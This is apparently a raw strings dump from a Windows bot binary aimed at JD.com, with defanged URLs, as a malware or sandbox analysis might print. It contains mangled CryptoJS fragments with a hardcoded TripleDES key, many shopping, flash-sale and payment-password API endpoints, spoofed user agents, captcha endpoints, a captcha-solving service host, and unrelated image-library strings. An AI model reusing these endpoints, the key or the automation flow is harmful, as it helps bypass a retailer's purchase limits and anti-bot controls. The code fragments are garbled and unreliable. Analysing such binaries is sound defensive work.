4294967296);e[(c 64>>>9<<4) 15]=(m<<8|m>>>24)&16711935|(m<<24|m>>>8)&4278255360;e[(c 64>>>9<<4) 14]=(a<<8|a>>>24)&16711935|(a<<24|a>>>8)&4278255360;b.sigBytes=4*(e.length 1);this._process();b=this._hash;e=b.words;for(a=0;4>a;a  )c=e[a],e[a]=(c<<8|c>>>24)&16711935|(c<<24|c>>>8)&4278255360;return b},clone:function(){var b=v.clone.call(this);b._hash=this._hash.clone();return b}});s.MD5=v._createHelper(q);s.HmacMD5=v._createHmacHelper(q)})(Math);
(function(){var u=CryptoJS,l=u.lib,d=l.Base,n=l.WordArray,l=u.algo,p=l.EvpKDF=d.extend({cfg:d.extend({keySize:4,hasher:l.MD5,iterations:1}),init:function(d){this.cfg=this.cfg.extend(d)},compute:function(d,l){for(var p=this.cfg,v=p.hasher.create(),b=n.create(),u=b.words,r=p.keySize,p=p.iterations;u.length<r;){e&&v.update(e);var e=v.update(d).finalize(l);v.reset();for(var a=1;a<p;a  )e=v.finalize(e),v.reset();b.concat(e)}b.sigBytes=4*r;return b}});u.EvpKDF=function(d,l,n){return p.create(n).compute(d,
CryptoJS.lib.Cipher||function(u){var l=CryptoJS,d=l.lib,n=d.Base,p=d.WordArray,s=d.BufferedBlockAlgorithm,q=l.enc.Base64,w=l.algo.EvpKDF,v=d.Cipher=s.extend({cfg:n.extend(),createEncryptor:function(m,a){return this.create(this._ENC_XFORM_MODE,m,a)},createDecryptor:function(m,a){return this.create(this._DEC_XFORM_MODE,m,a)},init:function(m,a,b){this.cfg=this.cfg.extend(b);this._xformMode=m;this._key=a;this.reset()},reset:function(){s.reset.call(this);this._doReset()},process:function(a){this._append(a);return this._process()},
finalize:function(a){a&&this._append(a);return this._doFinalize()},keySize:4,ivSize:4,_ENC_XFORM_MODE:1,_DEC_XFORM_MODE:2,_createHelper:function(m){return{encrypt:function(f,b,e){return("string"==typeof b?c:a).encrypt(m,f,b,e)},decrypt:function(f,b,e){return("string"==typeof b?c:a).decrypt(m,f,b,e)}}}});d.StreamCipher=v.extend({_doFinalize:function(){return this._process(!0)},blockSize:1});var b=l.mode={},x=function(a,f,b){var c=this._iv;c?this._iv=u:c=this._prevBlock;for(var e=0;e<b;e  )a[f e]^=
c[e]},r=(d.BlockCipherMode=n.extend({createEncryptor:function(a,f){return this.Encryptor.create(a,f)},createDecryptor:function(a,f){return this.Decryptor.create(a,f)},init:function(a,f){this._cipher=a;this._iv=f}})).extend();r.Encryptor=r.extend({processBlock:function(a,f){var b=this._cipher,c=b.blockSize;x.call(this,a,f,c);b.encryptBlock(a,f);this._prevBlock=a.slice(f,f c)}});r.Decryptor=r.extend({processBlock:function(a,b){var c=this._cipher,e=c.blockSize,d=a.slice(b,b e);c.decryptBlock(a,b);x.call(this,
a,b,e);this._prevBlock=d}});b=b.CBC=r;r=(l.pad={}).Pkcs7={pad:function(a,b){for(var c=4*b,c=c-a.sigBytes%c,e=c<<24|c<<16|c<<8|c,d=[],l=0;l<c;l =4)d.push(e);c=p.create(d,c);a.concat(c)},unpad:function(a){a.sigBytes-=a.words[a.sigBytes-1>>>2]&255}};d.BlockCipher=v.extend({cfg:v.cfg.extend({mode:b,padding:r}),reset:function(){v.reset.call(this);var a=this.cfg,c=a.iv,a=a.mode;if(this._xformMode==this._ENC_XFORM_MODE)var b=a.createEncryptor;else b=a.createDecryptor,this._minBufferSize=1;this._mode=b.call(a,
this,c&&c.words)},_doProcessBlock:function(a,c){this._mode.processBlock(a,c)},_doFinalize:function(){var a=this.cfg.padding;if(this._xformMode==this._ENC_XFORM_MODE){a.pad(this._data,this.blockSize);var c=this._process(!0)}else c=this._process(!0),a.unpad(c);return c},blockSize:4});var e=d.CipherParams=n.extend({init:function(a){this.mixIn(a)},toString:function(a){return(a||this.formatter).stringify(this)}}),b=(l.format={}).OpenSSL={stringify:function(a){var c=a.ciphertext;a=a.salt;return(a?p.create([1398893684,
1701076831]).concat(a).concat(c):c).toString(q)},parse:function(a){a=q.parse(a);var c=a.words;if(1398893684==c[0]&&1701076831==c[1]){var b=p.create(c.slice(2,4));c.splice(0,4);a.sigBytes-=16}return e.create({ciphertext:a,salt:b})}},a=d.SerializableCipher=n.extend({cfg:n.extend({format:b}),encrypt:function(a,c,b,d){d=this.cfg.extend(d);var l=a.createEncryptor(b,d);c=l.finalize(c);l=l.cfg;return e.create({ciphertext:c,key:b,iv:l.iv,algorithm:a,mode:l.mode,padding:l.padding,blockSize:a.blockSize,formatter:d.format})},
decrypt:function(a,c,b,e){e=this.cfg.extend(e);c=this._parse(c,e.format);return a.createDecryptor(b,e).finalize(c.ciphertext)},_parse:function(a,c){return"string"==typeof a?c.parse(a,this):a}}),l=(l.kdf={}).OpenSSL={execute:function(a,c,b,d){d||(d=p.random(8));a=w.create({keySize:c b}).compute(a,d);b=p.create(a.words.slice(c),4*b);a.sigBytes=4*c;return e.create({key:a,iv:b,salt:d})}},c=d.PasswordBasedCipher=a.extend({cfg:a.cfg.extend({kdf:l}),encrypt:function(c,b,e,d){d=this.cfg.extend(d);e=d.kdf.execute(e,
c.keySize,c.ivSize);d.iv=e.iv;c=a.encrypt.call(this,c,b,e.key,d);c.mixIn(e);return c},decrypt:function(c,b,e,d){d=this.cfg.extend(d);b=this._parse(b,d.format);e=d.kdf.execute(e,c.keySize,c.ivSize,b.salt);d.iv=e.iv;return a.decrypt.call(this,c,b,e.key,d)}})}();
(function(){function u(b,a){var c=(this._lBlock>>>b^this._rBlock)&a;this._rBlock^=c;this._lBlock^=c<<b}function l(b,a){var c=(this._rBlock>>>b^this._lBlock)&a;this._lBlock^=c;this._rBlock^=c<<b}var d=CryptoJS,n=d.lib,p=n.WordArray,n=n.BlockCipher,s=d.algo,q=[57,49,41,33,25,17,9,1,58,50,42,34,26,18,10,2,59,51,43,35,27,19,11,3,60,52,44,36,63,55,47,39,31,23,15,7,62,54,46,38,30,22,14,6,61,53,45,37,29,21,13,5,28,20,12,4],w=[14,17,11,24,1,5,3,28,15,6,21,10,23,19,12,4,26,8,16,7,27,20,13,2,41,52,31,37,47,
2147483674:134219776,2147483675:0,2147483676:133120,2147483677:2080,2147483678:131104,2147483679:134350848}],x=[4160749569,528482304,33030144,2064384,129024,8064,504,2147483679],r=s.DES=n.extend({_doReset:function(){for(var b=this._key.words,a=[],c=0;56>c;c  ){var d=q[c]-1;a[c]=b[d>>>5]>>>31-d2&1}b=this._subKeys=[];for(d=0;16>d;d  ){for(var f=b[d]=[],l=v[d],c=0;24>c;c  )f[c/6|0]|=a[(w[c]-1 l)(]<<31-c%6,f[4 (c/6|0)]|=a[28 (w[c 24]-1 l)(]<<31-c%6;f[0]=f[0]<<1|f[0]>>>31;for(c=1;7>c;c  )f[c]>>>=
4*(c-1) 3;f[7]=f[7]<<5|f[7]>>>27}a=this._invSubKeys=[];for(c=0;16>c;c  )a[c]=b[15-c]},encryptBlock:function(b,a){this._doCryptBlock(b,a,this._subKeys)},decryptBlock:function(b,a){this._doCryptBlock(b,a,this._invSubKeys)},_doCryptBlock:function(e,a,c){this._lBlock=e[a];this._rBlock=e[a 1];u.call(this,4,252645135);u.call(this,16,65535);l.call(this,2,858993459);l.call(this,8,16711935);u.call(this,1,1431655765);for(var d=0;16>d;d  ){for(var f=c[d],n=this._lBlock,p=this._rBlock,q=0,r=0;8>r;r  )q|=b[r][((p^
f[r])&x[r])>>>0];this._lBlock=p;this._rBlock=n^q}c=this._lBlock;this._lBlock=this._rBlock;this._rBlock=c;u.call(this,1,1431655765);l.call(this,8,16711935);l.call(this,2,858993459);u.call(this,16,65535);u.call(this,4,252645135);e[a]=this._lBlock;e[a 1]=this._rBlock},keySize:2,ivSize:2,blockSize:2});d.DES=n._createHelper(r);s=s.TripleDES=n.extend({_doReset:function(){var b=this._key.words;this._des1=r.createEncryptor(p.create(b.slice(0,2)));this._des2=r.createEncryptor(p.create(b.slice(2,4)));this._des3=
r.createEncryptor(p.create(b.slice(4,6)))},encryptBlock:function(b,a){this._des1.encryptBlock(b,a);this._des2.decryptBlock(b,a);this._des3.encryptBlock(b,a)},decryptBlock:function(b,a){this._des3.decryptBlock(b,a);this._des2.encryptBlock(b,a);this._des1.decryptBlock(b,a)},keySize:6,ivSize:2,blockSize:2});d.TripleDES=n._createHelper(s)})();
CryptoJS.mode.ECB=function(){var a=CryptoJS.lib.BlockCipherMode.extend();a.Encryptor=a.extend({processBlock:function(a,b){this._cipher.encryptBlock(a,b)}});a.Decryptor=a.extend({processBlock:function(a,b){this._cipher.decryptBlock(a,b)}});return a}();
var key = CryptoJS.enc.Utf8.parse('np!u5chin@adm!n1aaaaaaa2');
var r = CryptoJS.TripleDES.encrypt(CryptoJS.enc.Utf8.parse(mobile), key, { mode: CryptoJS.mode.ECB, padding: CryptoJS.pad.Pkcs7});
return r.toString();
].item.CanSelectGifts
].item.CanSelectGifts[
].ImgUrl
hXXp://img11.360buyimg.com/n3/
].giftMsg
cartJson.vendors[
lastOderInfo.address.Pin
].Phone
].TownName
].ProvinceName
].CityName
].CountryName
addressList[0].Id
addressList[0].TypeId
hXXp://api.m.jd.com/client.action?functionId=
.Flag
addAddress.AddressId
hXXp://api.m.jd.com/client.action?functionId=saveConsigneeAddress&uuid=
hXXp://api.m.jd.com/client.action?functionId=invoiceGeneral&uuid=
invoiceInfo.invoiceType
invoiceInfo.hasBookSku
invoiceInfo.hasCommonSku
invoiceInfo.vatInvoice.code
invoiceInfo.vatInvoice.canEdit
invoiceInfo.vatInvoice.regBankAccount
invoiceInfo.vatInvoice.regPhone
invoiceInfo.vatInvoice.regAddr
invoiceInfo.vatInvoice.companyName
invoiceInfo.vatInvoice.regBank
hXXp://api.m.jd.com/client.action?functionId=saveInvoice&uuid=
lastOderInfo.invoice.InvoiceTypeName
invoiceInfo.electroInvoice
invoiceInfo.normalInvoice.normalInvoiceContent.supportContent
invoiceInfo.normalInvoice.bookInvoiceContent.supportContent
invoiceInfo.electroInvoice.normalInvoiceContent.supportContent
invoiceInfo.electroInvoice.bookInvoiceContent.supportContent
&clientVersion=4.1.0&build=17402&client=android&d_brand=ONEPLUS&d_model=A0001&osVersion=4.3&screen=1920*1080&partner=baidu&area=
hXXp://order.m.jd.com/client.action?functionId=getCashCoupons&uuid=
getGiftCard.eGiftCards
getGiftCard.eGiftCards[
].Key
hXXp://order.m.jd.com/client.action?functionId=useLiPinKaPay&uuid=
getGiftCard.GiftCards
getGiftCard.GiftCards[
.vendors
.vendors[
].item.stockState
].item.remainNumInt
].stockState
].remainNumInt
hXXp://cart.m.jd.com/client.action?functionId=cartAdd&uuid=
lastOderInfo.commodities
].isMainSku
lastOderInfo.commodities[
].num
lastOderInfo.address.Phone
lastOderInfo.address.Where
lastOderInfo.address.Mobile
lastOderInfo.address.Name
lastOderInfo.address.IdProvince
lastOderInfo.address.IdCity
lastOderInfo.address.IdArea
lastOderInfo.address.IdTown
lastOderInfo.address.TownName
lastOderInfo.address.Id
lastOderInfo.address.addressDetail
lastOderInfo.address.ProvinceName
lastOderInfo.address.CityName
lastOderInfo.address.CountryName
&clientVersion=4.4.0&build=22955&client=android&d_brand=ONEPLUS&d_model=A0001&osVersion=4.3&screen=1920*1080&partner=baidu&area=
hXXp://order.m.jd.com/client.action?functionId=
hXXp://order.m.jd.com/client.action?functionId=updateAddress&uuid=
updateAddress.Flag
hXXp://api.m.jd.com/client.action?functionId=paymentType&uuid=
].payMentType
].payMentType[
].available
hXXp://api.m.jd.com/client.action?functionId=shipmentTypes&uuid=
shipmentTypesInfo.jdShipment.bigItemShipDates
shipmentTypesInfo.jdShipment.bigItemShipDates[
shipmentTypesInfo.jdShipment.bigItemShipDates[0].value
shipmentTypesInfo.jdShipment.bigItemInstallDatesList
shipmentTypesInfo.pickShipment.id
shipmentTypesInfo.pickShipment.available
shipmentTypesInfo.jdShipment.available
shipmentTypesInfo.jdShipment.id
shipmentTypesInfo.jdShipment.codeTime
shipmentTypesInfo.otherShipment.available
shipmentTypesInfo.otherShipment.id
shipmentTypesInfo.sopOtherShipment.available
shipmentTypesInfo.sopOtherShipment.id
hXXp://api.m.jd.com/client.action?functionId=savePaymentShipment&uuid=
lastOderInfo.payShipMap.pickShipment.pickId
shipmentTypesInfo.pickShipment.pickSites
shipmentTypesInfo.pickShipment.pickSites[
shipmentTypesInfo.pickShipment.pickDates
shipmentTypesInfo.pickShipment.pickDates[
shipmentTypesInfo.jdShipment.promise311
support
shipmentTypesInfo.jdShipment.promise411
hXXp://api.m.jd.com/client.action?functionId=getCashCouponsByPage&uuid=
usedElecCoupons.Coupons
].CanUsed
usedElecCoupons.Coupons[
].CouponType
].platform
].scope
].CouponStyle
].Selected
].limitType
].Quota
].Discount
].TimeBegin
].TimeEnd
hXXp://api.m.jd.com/client.action?functionId=useOrCancelCoupon&uuid=
Coupons[0].Quota
Coupons[0].Discount
Coupons[0].Key
Coupons[0].Id
usedElecCoupons.Flag
&clientVersion=4.4.3&build=23599&client=android&d_brand=ONEPLUS&d_model=A0001&osVersion=4.3&screen=1920*1080&partner=baidu&area=
hXXp://order.m.jd.com/client.action?functionId=useOrCancelCoupon&uuid=
hXXp://api.m.jd.com/client.action?functionId=useLiPinKaPay&uuid=
lastOderInfo.virtualPay.FactPrice
getByKey
hXXp://api.m.jd.com/client.action?functionId=getByKey&uuid=
m.jd.hk
p.m.jd.com
hXXp://p.m.jd.com/cart/cart.action?sid=
Mozilla/5.0 (Linux; U; Android 4.3; zh-CN; A0001 Build/JLS36C) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/10.6.2.626 U3/0.8.0 Mobile Safari/534.30
/cart/cart.action
&returnurl=hXXp://
hXXps://passport.m.jd.com/user/login.action?sid=
/cart/cart.action?sid=
dv(A0001);pr(UCBrowser/10.6.2.626);ov(Android 4.3);ss(360*640);pi(1080*1920);bt(YZ);pm(1);bv(1);nm(0);im(0);sr(0);nt(2);
/norder/order.action?enterOrder=true&sid=
hXXp://p.m.jd.com/cart/cart.action
<div class=.sitem-l.>([\s\S]*?)<[\s\S]*?sitem-r.>([\s\S]*?)<
orderKeyUrl" value="
orderKey" value="
hXXp://x.jd.com/clkinfo?rid=0.29329750477336347&callback=jsonp1
/norder/submit.action?sid=
/norder/order.action?enterOrder=true
Mozilla/5.0 (Linux; Android 4.4.2; NoxW Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Mobile Safari/537.36
hXXp://m.jd.hk
com.android.browser
order.securityPayPassword=&paymentType=
&order.securityPayPassword=
&flowType=&order.paymentId=
/norder/checkAndSubmitOrder.json
hXXp://p.m.jd.com
messageDialog.message
hXXp://p.m.jd.com/norder/payShipment.action?sid=
hXXp://p.m.jd.com/norder/order.action?enterOrder=true&sid=
order.pickSiteId" value="
order.sopOtherShipmentId" value="67"
&order.sopOtherShipmentId=67
&order.bigItemShipDate=
&order.codeTimeId=3
hXXp://p.m.jd.com/norder/pickSiteList.action?pickSiteId=
order.shipmentId" value="65"
order.shipmentId" value="66"
&order.promiseMessage=
&order.promiseTimeRange=
&order.promiseDate=
&order.promiseType=1&order.promiseSendPay=
hXXp://p.m.jd.com/norder/savePaymentShipment.action?sid=
&order.pickDateId=
&order.pickSiteId=
&order.shipmentId=
order.paymentId=
/norder/address.action?sid=
keyDown.*?(\d{6,})\D
keyDown\('(\d*)'\)
keyDown('
/norder/editAddress.action?vtuanOrder=false&addressId=
hXXp://p.m.jd.com/norder/address.action?sid=
address.name
address.mobile
address.provinceNameIgnore
address.idProvince
address.cityNameIgnore
address.idCity
address.areaNameIgnore
address.idArea
address.townNameIngore
address.idTown
address.where
hXXp://p.m.jd.com/unifiedlogin/checkcredentials.action?returnUrl=http://m.jd.hk/norder/updateAddress.action?
&address.where=
&address.idTown=
&address.idArea=
&address.idCity=
&address.idProvince=
&address.mobile=
&defaultFlag=1&address.name=
&address.zip=&vtuanOrder=false&address.oldMobile=
address.id=
/norder/updateAddress.action?sid=
&address.longitude=1000.0&address.latitude=1000.0&address.coordType=2&address.validRegion=false
&cartUse=true&address.name=
&address.townNameIngore=
&address.areaNameIgnore=
&address.cityNameIgnore=
&address.provinceNameIgnore=
&defaultFlag=1&address.addressDefault=
/norder/addOrUpdateAddress.json?sid=
hXXp://p.m.jd.com/norder/editAddress.action?vtuanOrder=false&addressId=
updateAddress.Message
hXXp://p.m.jd.com/norder/invoice.action?sid=
value="(.*?)".*?name="vatInvoiceFormData.code
value="(.*?)".*?name="vatInvoiceFormData.idInvoiceHeaderType
value="(.*?)".*?name="vatInvoiceFormData.idInvoiceContentsType
&vatInvoiceFormData.consigneeAddress=
&vatInvoiceFormData.consigneePhone=
&vatInvoiceFormData.consigneeTown=
&vatInvoiceFormData.consigneeTownId=
&vatInvoiceFormData.consigneeCounty=
&vatInvoiceFormData.consigneeCountyId=
&vatInvoiceFormData.consigneeCity=
&vatInvoiceFormData.consigneeCityId=
&vatInvoiceFormData.consigneeProvince=
&vatInvoiceFormData.consigneeProvinceId=
&vatInvoiceFormData.consigneeName=
&vatInvoiceFormData.idInvoiceContentsType=
&vatInvoiceFormData.idInvoiceHeaderType=
&vatInvoiceFormData.regBankAccount=
&vatInvoiceFormData.regPhone=
&vatInvoiceFormData.regAddr=
&vatInvoiceFormData.regBank=
&vatInvoiceFormData.code=
vatInvoiceFormData.vatCompanyName=
hXXp://p.m.jd.com/norder/updateVatInvoice.action?sid=
&normalInvoiceFormData.idInvoiceContentTypeBook=
normalInvoiceFormData.companyName=&personInvoiceTitleContant=个人&normalInvoiceFormData.idInvoiceHeaderType=-1&normalInvoiceFormData.idInvoiceContentsType=
&normalInvoiceFormData.idInvoiceContentsType=
&personInvoiceTitleContant=个人&normalInvoiceFormData.idInvoiceHeaderType=
normalInvoiceFormData.companyName=
&dzpInvoiceFormData.idInvoiceContentTypeBook=
&dzpInvoiceFormData.idInvoiceHeaderType=4&dzpInvoiceFormData.idInvoiceContentsType=
&dzpInvoiceFormData.electroInvoiceEmail=
dzpInvoiceFormData.electroInvoicePhone=
hXXp://p.m.jd.com/norder/updateEleInvoice.action?sid=
hXXp://p.m.jd.com/norder/updateNormalInvoice.action?sid=
149,100,237
127,255,80
105,210,30
255,127,0
158,95,160
184,222,135
42,165,42
43,138,226
235,255,205
228,255,196
245,245,220
255,127,212
205,154,50
this.ShieldEncoder = (function() {
this.init()
e.prototype = {
var g = new f().handle(j);
h = i.first(h);
h = this.encoder(h, g);
h = i.last(h);
for (var h = 0; h < k.length; h  ) {
g  = String.fromCharCode(k.charCodeAt(h) ^ j)
d.prototype = {
for (var g = 0; g < h.length; g  ) {
l  = h.charAt(g);
if (l.length == 5) {
k.push(this.reverse(l));
if (l.length < 5) {
for (var g = h.length - 1; g >= 0; g--) {
var g = h.split("");
g.reverse();
return g.join("")
f.prototype = {
return this.hash(g) & (g.length - 1)
var g = l.length;
k = 31 * k   l.charCodeAt(m  );
var g = this.ShieldEncoder.encode(s,"li43fevlisdfil234li");
hXXp://m.jd.hk/pay/pay.action?orderId=
hXXp://m.jd.hk/norder/submit.action?sid=
payParamsObject.needVerify
hXXps://pay.m.jd.com/newpay/verify.action
hXXp://home.m.jd.com/user/waite4Payment.action?sid=
hXXp://p.m.jd.com/pay/pay.action?orderId=
@payParamsObject.indexInfo
&systemKey=user_detail&token=juies88kie6tg32h322h32gv22&_=
hXXp://hgrpcpop.jd.com/queryCustomsStates/getOrderInfoJsfResult.json?callback=jQuery6703167&orderId=
hXXp://blsfz.jd.hk/idCard/fill_
hXXp://blsfz.jd.hk/idCard/saveIdCard.do?orderId=
errorMsg
hXXp://tuan.jd.com/gift/buyGift.html?giftId=
&_=14159337163
hXXp://tuan.jd.com/api/address.action?actionDo=GetLastSubmitSuccessOrder&teamId=0&callback=jsonp
hXXp://tuan.jd.com/api/address.action?callback=jsonp
hXXp://tuan.jd.com/gift/submitGift.action
&giftOrder.zipCode=&giftOrder.quantity=
&giftOrder.email=
&giftOrder.phone=
&giftOrder.mobile=
&giftOrder.where=
&giftOrder.realName=
&giftOrder.townName=
&giftOrder.townId=
&giftOrder.countyName=
&giftOrder.countyId=
&giftOrder.cityName=
&giftOrder.cityId=
&giftOrder.provinceName=
&giftOrder.provinceId=
&giftOrder.giftId=
giftOrder.userPayPwd=
hXXp://item.m.jd.com/ja.jsp
hXXp://p.m.jd.com/cart/add.json?wareId=
.html?resourceType=cart&resourceValue=unknown&sid=
hXXp://item.m.jd.com/product/
hXXp://p.m.jd.com/cart/check.json?checked=7&sid=
cart.PriceShow
cart.vendors
cart.vendors[
hXXp://m.jd.hk/norder/order.action?enterOrder=true&sid=
hXXp://v.m.jd.com/international/index.action?returnurl=http://m.jd.hk/norder/order.action?enterOrder=true
hXXp://p.m.jd.com/norder/calcYunfeeVm.action?sid=
hXXp://p.m.jd.com/ja.jsp
hXXp://home.m.jd.com/newAllOrders/newAllOrders.json?sid=
hXXp://home.m.jd.com
hXXp://home.m.jd.com/user/cancelOrder.json?orderId=
cart.code
hXXp://p.m.jd.com/cart/remove.json?wareId=
Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X; en-us) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53
].item.Skus[0].Id
].item.Skus[0].Num
cartJson.vendors
@@1@@16@@
hXXp://p.m.jd.com/cart/addWares.json?wareInfos=
cartJson.PriceShow
hXXp://p.m.jd.com/norder/couponsNewRule.action?couponsId=&sid=
hXXp://p.m.jd.com/norder/couponsNewRule.json?couponsId=&sid=
].key
].canUsed
].couponStyle
].selected
].quota
].discount
].timeBegin
].timeEnd
&useOrCancelCouponPara.Selected=false&useOrCancelCouponPara.Id=
hXXp://p.m.jd.com/norder/useOrCancelCoupon.json?useOrCancelCouponPara.Key=
&useOrCancelCouponPara.Selected=true&useOrCancelCouponPara.Id=
Coupons[0].quota
Coupons[0].discount
Coupons[0].key
Coupons[0].id
].couponType
hXXp://p.m.jd.com/norder/giftcards.action?sid=
hXXp://p.m.jd.com/norder/updateGiftCards.action?sid=
http://divide.jd.com/user_routing?skuId=
jdapp;android;3.2.1;4.3;
/mobile/koFail.html
.jd.com
.jd.com/validateM/repeatGoToOrder?skuId=
jdapp;android;4.2.0;4.3;
.jd.com/mAsync/getUsualAddressList.action?m=true&sid=
;psq/27;ref/;pap/JA2015_311210|4.4.3|ANDROID;usc/;usp/;umd/;utr/;adk/;ads/;Mozilla/5.0 (Linux; Android 4.4.2; NoxW Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Mobile Safari/537.36
;network/wifi;osp/android;apv/4.4.3;osv/4.4.2;uid/
jdapp;android;4.4.3;4.4.2;
&orderParam.mobileKey=
&orderParam.email=&orderParam.mobile=
&orderParam.name=
&orderParam.provinceName=
orderParam.provinceId=
.jd.com/seckillM/saveConsignee.action?sid=
.jd.com/seckillM/editConsignee.action?sid=
.jd.com/seckillM/seckill.action?sid=
mobileKey" value="
.jd.com/mAsync/calcuOrderPrice.action?sid=
hXXp://marathon.jd.com/seckillM/seckill.action?skuId=
&orderParam.invoiceTitle=
&orderParam.codTimeType=
&orderParam.email=&orderParam.paymentType=
&password=&orderParam.name=
.jd.com/seckillM/submitOrder.action?skuId=
/seckillSuccess.action
.jd.com/seckillM/getCouponList.action?sid=
;psq/10;ref/;pap/JA2015_311210|5.1.0|ANDROID;usc/;usp/;umd/;utr/;adk/;ads/;Mozilla/5.0 (Linux; Android 4.4.2; NoxW Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Mobile Safari/537.36
;network/wifi;osp/android;apv/5.1.0;osv/4.4.2;uid/
jdapp;android;5.1.0;4.4.2;
.jd.com/mAsync/cancelCoupon.action?m=true&sid=
hXXp://marathon.jd.com/mAsync/calcuOrderPrice.action?sid=
.jd.com/mAsync/useCoupon.action?m=true&sid=
Mozilla/5.0 (Linux; U; Android 5.1.1; zh-cn; Mi-4c Build/LMY47V) AppleWebKit/537.36 (KHTML, like Gecko)Version/4.0 Chrome/37.0.0.0 MQQBrowser/6.5 Mobile Safari/537.36
Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.80 Safari/537.36 Core/1.47.163.400 QQBrowser/9.3.7175.400
hXXp://item.m.jd.com/ware/judgeOrder.json?wareId=
.html?sid=
com.tencent.mtt
hXXp://marathon.jd.com
.jd.com/mAsync/getJBeanInfo.action?sid=
(*.txt)
hXXp://odo.jd.com/oc/toolbar_confirmDeliver?action=confirmDeliver&orderid=
hXXp://odo.jd.com/order/toolbar_confirmDeliver?action=confirmDeliver&orderid=
hXXp://order.jd.com/normal/confirmReceipt.action?orderid=
hXXp://order.jd.com/normal/canReceiveSuccess.action
Mozilla/5.0 (Windows NT 6.1; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0
password=
hXXp://try.jd.com/details/clickApply.action?callback=jQuery970631&activityId=
hXXp://try.jd.com/
isLogin
hXXp://yushou.jd.com/youshouinfo.action?sku=
codeUrl" name="key" value="
keyForSku" name="key" value="
hXXp://yushou.jd.com/check/validateRandomCode.action
hXXp://yushou.jd.com/toYuyue.action?sku=
hXXp://yushou.jd.com/yuyue.action?mobileCode=&mobile=
hXXp://ware.m.jd.com/client.action?functionId=isAppoint&uuid=
sec_comp.bsid
&clientVersion=4.4.3&build=23599&client=android&d_brand=ONEPLUS&d_model=A0001&osVersion=5.1.1&screen=1920*1080&partner=exun007&area=&networkType=wifi&st=
hXXp://i.m.jd.com/client.action?functionId=secCaptchaCode&body=
hXXp://ware.m.jd.com/client.action?functionId=appoint&uuid=
wareInfo.yuyueInfo.yuyueNum
hXXp://passport.jd.com/uc/login?ltype=logout
VVV.jd.com
&clientVersion=4.4.1&build=23145&client=android&d_brand=ONEPLUS&d_model=A0001&osVersion=4.3&screen=1920*1080&partner=baidu&area=&networkType=wifi&sign=
wareInfo.basicInfo.name
hXXp://ware.m.jd.com/client.action?functionId=skuDyInfo&uuid=
wareInfo.jprice.value
wareInfo.pcPrice.value
SSSSSh`Q
~%SSh
MFC42.DLL
WSOCK32.dll
MSVCP60.dll
%s_next%d.txt
d%sd%sd:d
%s%sMdd%s
%s%sM%sd
LogFiles\OperationLog\
socket (%d)
(%d)socket
Únd%d
(%d)[%d-%d=%d]
(%s) %s
TimeOut = %d
d.woniudati.com/ip.htm
dll.woniudama.com
<W><G>%s</G><C>L</C><T>1</T><N>%s</N><P>%s</P><DLL>%s</DLL><IID>%s</IID></W>
<W><G>%s</G><C>A</C><T>1</T><S>%s</S><I>
<W><G>%s</G><C>E</C><T>1</T><Id>%s</Id></W>
<W><G>%s</G><C>B</C><T>1</T></W>
%s|%s
9.tdj.h
hCRTkP
hCRTrS
hCRTgS
hCRTbS
CRTr
CRTg
CRTb
lFtP
tcpO
tcpOt1
tcpOtQ
tcpOtN
tcpOt.
Multipage Encode, Unsupported operation for this format
Page %d
Save PSD not supported
Save RAW not supported
Save WMF not supported
Unsupported WBMP type
1.5.0
compression type not supported
Portable Graymap/Pixmap (PNM)
? %s %s %d %ld %ld
error: BMP format does not support color space
tileno = %d; len = %d; partno = %d; numparts = %d
prec[%d] = %d; sgnd[%d] = %d; hsamp[%d] = %d; vsamp[%d] = %d
tilewidth = %d; tileheight = %d; tilexoff = %d; tileyoff = %d;
width = %d; height = %d; xoff = %d; yoff = %d;
caps = 0xx;
prcwidth[%d] = %d, prcheight[%d] = %d
cblkwidthval = %d; cblkheightval = %d; cblksty = 0xx;
prg = %d; numlyrs = %d;
numdlvls = %d; qmfbid = %d; mctrans = %d
csty = 0xx;
cblkwidthval = %d; cblkheightval = %d; cblksty = 0xx; qmfbid = %d;
compno = %d; csty = 0xx; numdlvls = %d;
compno = %d; roisty = %d; roishift = %d
expn[%d] = 0xx; mant[%d] = 0xx;
qntsty = %d; numguard = %d; numstepsizes = %d
compno = %d; qntsty = %d; numguard = %d; numstepsizes = %d
seqno = %d;
ind=%d; len = %d;
le[%d] = %d
rs[%d] = %d; re[%d] = %d;
cs[%d] = %d; ce[%d] = %d;
po[%d] = %d;
hoff[%d] = %d; voff[%d] = %d
regid = %d;
len = %d;
type = 0xx (%s);
Creator: JasPer Version %s
lyrno=d cmptno=d rlvlno=d bandno=d prcno=d cblkno=d passno=d
lyrno = d
success %d goodthresh %f
MbP?maxlen=ld actuallen=ld thresh=%f
min rdslope = %f max rdslope = %f
cblk ] ] ] ]
prc ] ] ] ] (] ])
band ] ] ] ]
rlvl ] ] ] ]
tcmpt ] ] ] ]
invalid code block width %d
invalid code block height %d
warning: ignoring invalid option %s
warning: invalid intermediate layer rates specifier ignored (%s)
ignoring bad rate specifier %s
ignoring invalid progression order %s
ignoring invalid mode %s
unsupported image type
error: too few guard bits (need at least %d)
CODE BLOCK %d
CODE BLOCK GROUP %d
BAND %d
xs =%d, ys = %d, xe = %d, ye = %d, w = %d, h = %d
RESOLUTION LEVEL %d
ICC Profile CS x
error: unsupported compression type
box type %s
warning: palettized images not fully supported
error: encoding method not supported
error: RLE encoding method not supported
error: unsupported color space
unsupported BMP encoding
error: unsupported BMP encoding
THE BMP FORMAT IS NOT FULLY SUPPORTED!
no palettized image support for BMP format
%s%ld
warning: support for signed sample data requires use of nonstandard extension to PNM format
data=%s
component tlx=%ld tly=%ld sampperx=%ld samppery=%ld width=%ld height=%ld prec=%d sgnd=%d
error: PNM support required
warning: ignoring unsupported options
(%f, %f, %f)
entry[%d] = %f
gamma = %f
number of entires = %d
maclen = %d
sccode = %d
uclangcode = %d; uclen = %d
ascii = "%s"
string = "%s"
numintabents=%d, numouttabents=%d
